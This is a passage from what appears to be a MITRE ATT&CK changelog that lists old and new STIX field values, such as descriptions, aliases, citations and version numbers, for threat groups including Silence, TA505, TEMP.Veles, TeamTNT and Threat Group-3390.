| external_references[12]['description'] | Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020. | Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018. |
| external_references[12]['url'] | https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/ |
| external_references[13]['source_name'] | NCSC Sandworm Feb 2020 | InfoSecurity Sandworm Oct 2014 |
| external_references[13]['description'] | NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020. | Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017. |
| external_references[13]['url'] | https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory | https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/ |
| external_references[14]['source_name'] | US District Court Indictment GRU Oct 2018 | NCSC Sandworm Feb 2020 |
| external_references[14]['description'] | Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020. | NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020. |
| external_references[14]['url'] | https://www.justice.gov/opa/page/file/1098481/download | https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory |
| external_references[15]['source_name'] | F-Secure BlackEnergy 2014 | USDOJ Sandworm Feb 2020 |
| external_references[15]['description'] | F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016. | Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020. |
| external_references[15]['url'] | https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf | https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html |
| external_references[16]['source_name'] | InfoSecurity Sandworm Oct 2014 | US District Court Indictment GRU Unit 74455 October 2020 |
| external_references[16]['description'] | Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017. | Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020. |
| external_references[16]['url'] | https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/ | https://www.justice.gov/opa/press-release/file/1328521/download |
| external_references[17]['source_name'] | Dragos ELECTRUM | Secureworks IRON VIKING |
| external_references[17]['description'] | Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020. | Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020. |
| external_references[17]['url'] | https://www.dragos.com/resource/electrum/ | https://www.secureworks.com/research/threat-profiles/iron-viking |
| external_references[18]['source_name'] | Secureworks IRON VIKING | UK NCSC Olympic Attacks October 2020 |
| external_references[18]['description'] | Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020. | UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020. |
| external_references[18]['url'] | https://www.secureworks.com/research/threat-profiles/iron-viking | https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games |
| x_mitre_version | 2.1 | 2.2 |
| Description |
|---|
| [Silence](https://attack.mitre.org/groups/G0091) is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank's Automated Workstation Client, ATMs, and card processing.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-05-26 19:54:55.580000+00:00 | 2022-06-02 20:13:56.605000+00:00 |
| aliases[1] | WHISPER SPIDER | Whisper Spider |
| external_references[1]['source_name'] | Silence | Whisper Spider |
| external_references[1]['description'] | (Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017) | (Citation: Crowdstrike GTR2020 Mar 2020) |
| external_references[2]['source_name'] | WHISPER SPIDER | Silence |
| external_references[2]['description'] | (Citation: Crowdstrike GTR2020 Mar 2020) | (Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017) |
| external_references[3]['source_name'] | Cyber Forensicator Silence Jan 2019 | Crowdstrike GTR2020 Mar 2020 |
| external_references[3]['description'] | Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019. | Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020. |
| external_references[3]['url'] | https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/ | https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf |
| external_references[5]['source_name'] | Crowdstrike GTR2020 Mar 2020 | Cyber Forensicator Silence Jan 2019 |
| external_references[5]['description'] | Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020. | Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019. |
| external_references[5]['url'] | https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf | https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/ |
| Description |
|---|
| [Suckfly](https://attack.mitre.org/groups/G0039) is a China-based threat group that has been active since at least 2014. (Citation: Symantec Suckfly March 2016) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 19:21:39.854000+00:00 | 2022-04-15 16:27:38.682000+00:00 |
| external_references[2]['description'] | DiMaggio, J.. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016. | DiMaggio, J. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016. |
| external_references[3]['description'] | DiMaggio, J.. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016. | DiMaggio, J. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016. |
| Old Description | New Description |
|---|---|
| [TA505](https://attack.mitre.org/groups/G0092) is a financially motivated threat group that has been active since at least 2014. The group is known for frequently changing malware and driving global trends in criminal malware distribution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019) | [TA505](https://attack.mitre.org/groups/G0092) is a cyber criminal group that has been active since at least 2014. [TA505](https://attack.mitre.org/groups/G0092) is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving [Clop](https://attack.mitre.org/software/S0611).(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: NCC Group TA505)(Citation: Korean FSI TA505 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 20:27:57.195000+00:00 | 2022-10-13 16:17:20.601000+00:00 |
| description | [TA505](https://attack.mitre.org/groups/G0092) is a financially motivated threat group that has been active since at least 2014. The group is known for frequently changing malware and driving global trends in criminal malware distribution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019) | [TA505](https://attack.mitre.org/groups/G0092) is a cyber criminal group that has been active since at least 2014. [TA505](https://attack.mitre.org/groups/G0092) is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving [Clop](https://attack.mitre.org/software/S0611).(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: NCC Group TA505)(Citation: Korean FSI TA505 2020) |
| external_references[2]['source_name'] | Proofpoint TA505 Sep 2017 | Korean FSI TA505 2020 |
| external_references[2]['description'] | Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019. | Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022. |
| external_references[2]['url'] | https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter | https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory= |
| external_references[3]['source_name'] | Proofpoint TA505 June 2018 | IBM TA505 April 2020 |
| external_references[3]['description'] | Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019. | Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020. |
| external_references[3]['url'] | https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times | https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/ |
| external_references[4]['source_name'] | Proofpoint TA505 Jan 2019 | Proofpoint TA505 Sep 2017 |
| external_references[4]['description'] | Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019. | Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019. |
| external_references[4]['url'] | https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505 | https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter |
| external_references[5]['source_name'] | IBM TA505 April 2020 | Proofpoint TA505 June 2018 |
| external_references[5]['description'] | Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020. | Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019. |
| external_references[5]['url'] | https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/ | https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times |
| x_mitre_version | 1.3 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Proofpoint TA505 Jan 2019', 'description': 'Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505'} | |
| external_references | {'source_name': 'NCC Group TA505', 'description': 'Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.', 'url': 'https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/'} |
| Description |
|---|
| [TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing [TRITON](https://attack.mitre.org/software/S0609), a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Dragos Threat Intelligence'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://dragos.com/resource/xenotime/ |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 14:49:09.631000+00:00 | 2022-05-24 16:22:20.856000+00:00 |
| external_references[2]['source_name'] | XENOTIME | Dragos Xenotime 2018 |
| external_references[2]['description'] | The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind TRITON .(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 ) | Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019. |
| external_references[3]['source_name'] | FireEye TRITON 2019 | FireEye TEMP.Veles 2018 |
| external_references[3]['description'] | Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019. | FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html | https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html |
| external_references[4]['source_name'] | FireEye TEMP.Veles 2018 | FireEye TEMP.Veles 2018 |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html | https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html |
| external_references[5]['source_name'] | FireEye TEMP.Veles JSON April 2019 | FireEye TRITON 2019 |
| external_references[5]['description'] | Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019. | Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019. |
| external_references[5]['url'] | https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html | https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html |
| external_references[6]['source_name'] | Dragos Xenotime 2018 | FireEye TEMP.Veles JSON April 2019 |
| external_references[6]['description'] | Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019. | Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019. |
| external_references[6]['url'] | https://dragos.com/resource/xenotime/ | https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html |
| external_references[8]['source_name'] | FireEye TEMP.Veles 2018 | XENOTIME |
| external_references[8]['description'] | FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019. | The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609) .(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 ) |
| Old Description | New Description |
|---|---|
| [TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments. (Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021) | [TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.(Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 18:47:18.824000+00:00 | 2022-10-19 21:35:03.147000+00:00 |
| description | [TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments. (Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021) | [TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.(Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021) |
| external_references[1]['source_name'] | Palo Alto Black-T October 2020 | ATT TeamTNT Chimaera September 2020 |
| external_references[1]['description'] | Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021. | AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021. |
| external_references[1]['url'] | https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/ | https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera |
| external_references[2]['source_name'] | Lacework TeamTNT May 2021 | Cado Security TeamTNT Worm August 2020 |
| external_references[2]['description'] | Stroud, J. (2021, May 25). Taking TeamTNT's Docker Images Offline. Retrieved September 22, 2021. | Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021. |
| external_references[2]['url'] | https://www.lacework.com/blog/taking-teamtnt-docker-images-offline/ | https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/ |
| external_references[3]['source_name'] | Intezer TeamTNT September 2020 | Unit 42 Hildegard Malware |
| external_references[3]['description'] | Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021. | Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. |
| external_references[3]['url'] | https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/ | https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ |
| external_references[4]['source_name'] | Cado Security TeamTNT Worm August 2020 | Trend Micro TeamTNT |
| external_references[4]['description'] | Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021. | Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021. |
| external_references[4]['url'] | https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/ | https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf |
| external_references[5]['source_name'] | Unit 42 Hildegard Malware | Intezer TeamTNT September 2020 |
| external_references[5]['description'] | Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. | Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021. |
| external_references[5]['url'] | https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ | https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/ |
| external_references[6]['source_name'] | Trend Micro TeamTNT | Intezer TeamTNT Explosion September 2021 |
| external_references[6]['description'] | Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021. | Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021. |
| external_references[6]['url'] | https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf | https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf |
| external_references[7]['source_name'] | ATT TeamTNT Chimaera September 2020 | Aqua TeamTNT August 2020 |
| external_references[7]['description'] | AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021. | Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021. |
| external_references[7]['url'] | https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera | https://blog.aquasec.com/container-security-tnt-container-attack |
| external_references[8]['source_name'] | Aqua TeamTNT August 2020 | Palo Alto Black-T October 2020 |
| external_references[8]['description'] | Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021. | Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021. |
| external_references[8]['url'] | https://blog.aquasec.com/container-security-tnt-container-attack | https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/ |
| external_references[9]['source_name'] | Intezer TeamTNT Explosion September 2021 | Lacework TeamTNT May 2021 |
| external_references[9]['description'] | Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021. | Stroud, J. (2021, May 25). Taking TeamTNT's Docker Images Offline. Retrieved September 22, 2021. |
| external_references[9]['url'] | https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf | https://www.lacework.com/blog/taking-teamtnt-docker-images-offline/ |
| x_mitre_version | 1.0 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Darin Smith, Cisco |
| Old Description | New Description |
|---|---|
| [Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims. (Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, and manufacturing sectors. (Citation: SecureWorks BRONZE UNION June 2017) (Citation: Securelist LuckyMouse June 2018) | [Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims.(Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Securelist LuckyMouse June 2018)(Citation: Trend Micro DRBControl February 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Daniyal Naeem, BT Security', 'Kyaw Pyiyt Htet, @KyawPyiytHtet'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 19:21:39.120000+00:00 | 2022-04-11 18:05:20.983000+00:00 |
| description | [Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims. (Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, and manufacturing sectors. (Citation: SecureWorks BRONZE UNION June 2017) (Citation: Securelist LuckyMouse June 2018) | [Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims.(Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Securelist LuckyMouse June 2018)(Citation: Trend Micro DRBControl February 2020) |
| external_references[1]['description'] | (Citation: Dell TG-3390) (Citation: Hacker News LuckyMouse June 2018) | (Citation: Dell TG-3390)(Citation: Hacker News LuckyMouse June 2018) |
| external_references[2]['description'] | (Citation: Dell TG-3390) (Citation: Nccgroup Emissary Panda May 2018) (Citation: Hacker News LuckyMouse June 2018) | (Citation: Dell TG-3390)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Hacker News LuckyMouse June 2018) |
| external_references[3]['description'] | (Citation: Gallagher 2015) (Citation: Nccgroup Emissary Panda May 2018) (Citation: Securelist LuckyMouse June 2018) (Citation: Hacker News LuckyMouse June 2018)(Citation: Unit42 Emissary Panda May 2019) | (Citation: Gallagher 2015)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Unit42 Emissary Panda May 2019)(Citation: Trend Micro Iron Tiger April 2021) |
| external_references[4]['source_name'] | BRONZE UNION | Iron Tiger |
| external_references[4]['description'] | (Citation: SecureWorks BRONZE UNION June 2017) (Citation: Nccgroup Emissary Panda May 2018) | (Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021) |
| external_references[5]['description'] | (Citation: Nccgroup Emissary Panda May 2018) (Citation: Securelist LuckyMouse June 2018) (Citation: Hacker News LuckyMouse June 2018) | (Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021) |
| external_references[6]['source_name'] | Iron Tiger | LuckyMouse |
| external_references[6]['description'] | (Citation: Hacker News LuckyMouse June 2018) | (Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021) |
| external_references[7]['source_name'] | LuckyMouse | BRONZE UNION |
| external_references[7]['description'] | (Citation: Securelist LuckyMouse June 2018) (Citation: Hacker News LuckyMouse June 2018) | (Citation: SecureWorks BRONZE UNION June 2017)(Citation: Nccgroup Emissary Panda May 2018) |
| external_references[8]['source_name'] | Dell TG-3390 | Earth Smilodon |
| external_references[8]['description'] | Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018. | (Citation: Trend Micro Iron Tiger April 2021) |
| external_references[10]['source_name'] | Securelist LuckyMouse June 2018 | Dell TG-3390 |
| external_references[10]['description'] | Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018. | Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018. |
| external_references[10]['url'] | https://securelist.com/luckymouse-hits-national-data-center/86083/ | https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage |
| external_references[11]['source_name'] | Hacker News LuckyMouse June 2018 | Unit42 Emissary Panda May 2019 |
| external_references[11]['description'] | Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018. | Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019. |
| external_references[11]['url'] | https://thehackernews.com/2018/06/chinese-watering-hole-attack.html | https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ |
| external_references[12]['source_name'] | Nccgroup Emissary Panda May 2018 | Gallagher 2015 |
| external_references[12]['description'] | Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018. | Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016. |
| external_references[12]['url'] | https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/ | http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/ |
